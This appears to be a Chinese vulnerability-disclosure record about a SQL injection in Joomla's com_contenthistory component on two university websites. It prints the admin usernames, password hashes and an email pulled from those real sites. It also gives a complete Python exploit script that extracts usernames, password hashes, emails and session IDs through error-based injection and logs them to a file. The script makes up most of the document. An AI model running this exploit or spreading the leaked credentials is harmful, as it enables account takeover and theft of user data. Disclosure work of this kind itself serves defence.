2015-10-29: 细节已通知厂商并且等待厂商处理中 2015-10-29: 厂商已经确认,细节仅向厂商公开 2015-11-08: 细节向核心白帽子及相关领域专家公开 2015-11-18: 细节向普通白帽子公开 2015-11-28: 细节向实习白帽子公开 2015-12-13: 细节向公众公开
梦里寻他千百度,蓦然回首那人却在灯火阑珊处!
url: http://www.nfu.edu.cn/, admin: hljkdlic, password: $P$DIvYV9IubMDGrs3UzM53tH9oEAQdw2/, email: hectorbonilha2018@gmail.comurl: http://www.nfsysu.cn/, admin: hljkdlic, password: $P$DIvYV9IubMDGrs3UzM53tH9oEAQdw2/, email: hectorbonilha2018@gmail.com
验证脚本:
def checkJoomlaSQLi(url): url = url.strip() poc = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select 0x6176666973686572),floor(rand(0)*2))x from information_schema.tables group by x)a)" urlA=url+poc try: result = requests.get(urlA,timeout=30,allow_redirects=True,verify=False).content if 'avfisher' in result: username = getInfoByJoomlaSQLi(url, 'username') password = getInfoByJoomlaSQLi(url, 'password') email = getInfoByJoomlaSQLi(url, 'email') session_id = getInfoByJoomlaSQLi(url, 'session_id') vuls='[+] vuls found! url: '+url+', admin: '+username+', password: '+password+', email: '+email+', session_id: '+session_id logfile(vuls,'joomla_vuls.txt') print vuls else: print '[!] no vuls! url: '+url except Exception,e: print '[!] connection failed! url: '+urldef getInfoByJoomlaSQLi(url, param): if 'username' in param: payload = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(username)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" elif 'password' in param: payload = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" elif 'email' in param: payload = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(email)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" elif 'session_id' in param: payload = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(session_id)) from %23__session limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" urlA=url+payload try: result = requests.get(urlA,timeout=30,allow_redirects=True,verify=False).content reg = ".*Duplicate entry \'(.*?)1\'.*" match_url = re.search(reg,result) if match_url: info=match_url.group(1) return info except Exception,e: return 'no info!'
升级到最新版本的Joomla
危害等级:低
漏洞Rank:5
确认时间:2015-10-29 22:43
谢谢提醒,我们马上处理
暂无